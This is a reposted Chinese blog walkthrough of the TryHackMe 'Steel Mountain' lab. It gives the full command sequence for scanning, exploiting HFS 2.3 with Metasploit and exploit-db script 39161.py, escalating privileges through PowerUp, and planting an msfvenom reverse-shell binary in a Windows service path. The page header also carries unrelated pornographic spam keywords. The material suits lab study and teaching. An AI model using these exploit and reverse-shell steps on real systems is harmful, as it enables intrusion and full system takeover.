日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > windows >内容正文

windows

tryhackme进攻性渗透测试-Advanced Exploitation 高级利用

發布時間:2023/12/24 windows 34 coder
生活随笔 收集整理的這篇文章主要介紹了 tryhackme进攻性渗透测试-Advanced Exploitation 高级利用 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

Steel Mountain

  • 偵察
Nmap -sC -sV -O $IP -oN basic_scan.nmap
Nmap -script=vuln $IP -oN vuln_scan.nmap

總之,masscan在eth0上工作,所以SYN端口探測技術全部沒有響應包

需要一個flag把探測流量正確的打入tun0中
masscan -p8080 10.10.205.233 -e tun0

nmap除了使用SYN端口探測之外,還使用協議"敲門"技術:它知道往8080端口嘗試發送HTTP協議的請求格式,再提取響應進一步處理。

總之nmap知道把流量發給tun0,所以一切的端口探測技術或協議“敲門”技術都有一個正確的回應。

  • 立足點

HFS 2.3 軟件版本號 歷史漏洞一把梭

use exploit/windows/http/rejetto_hfs_exec
set rhosts <target ip>
set rport 8080 
set lhost tun0
exploit

  • 錯誤配置之PowerUp提權

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

PowerUp 的 powershell 腳本,評估 Windows的錯誤配置來提權

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
upload ./PowerUp.ps1

PS 下的wget
PS> wget http://tun0 ip:port/PowerUp.ps1 -OutFile PowerUp.Ps1

切換到PS shell

load powershell
powershell_shell

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks

制作payload
msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=4443 -f exe -o Advanced.exe

meterpreter> background
msf6 exploit(windows/http/rejetto_hfs_exec)> use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > exploit -j
msf6 exploit(multi/handler) > sessions
msf6 exploit(multi/handler) > sessions -i 3

cd "C:/Program Files (x86)\IObit"
upload Advanced.exe

cmd 的shell

shell
sc stop AdvancedSystemCareService9
copy Advanced.exe "Advanced SystemCare"
sc start AdvancedSystemCareService9

使用提權到system的shell進入桌面拿root.txt

cd "C:\Users\Administrator\Desktop"
type root.txt

  • 不依賴msf的shell,exp py腳本打點
    nc
    https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
searchsploit rejetto
searchsploit -x 39161.py

第 1 階段:該漏洞將在本地計算機文件系統中查找 nc.exe 文件并將其上傳到目標計算機。
第 2 階段:該漏洞將在目標服務器上執行 nc.exe,強制其連接到我們的本地主機。

cp /usr/share/exploitdb/exploits/windows/remote/39161.py ./39161.py

nc -lnvp 5555
python -m http.server 80
python2 39161.py 10.10.205.233 8080

總結

以上是生活随笔為你收集整理的tryhackme进攻性渗透测试-Advanced Exploitation 高级利用的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。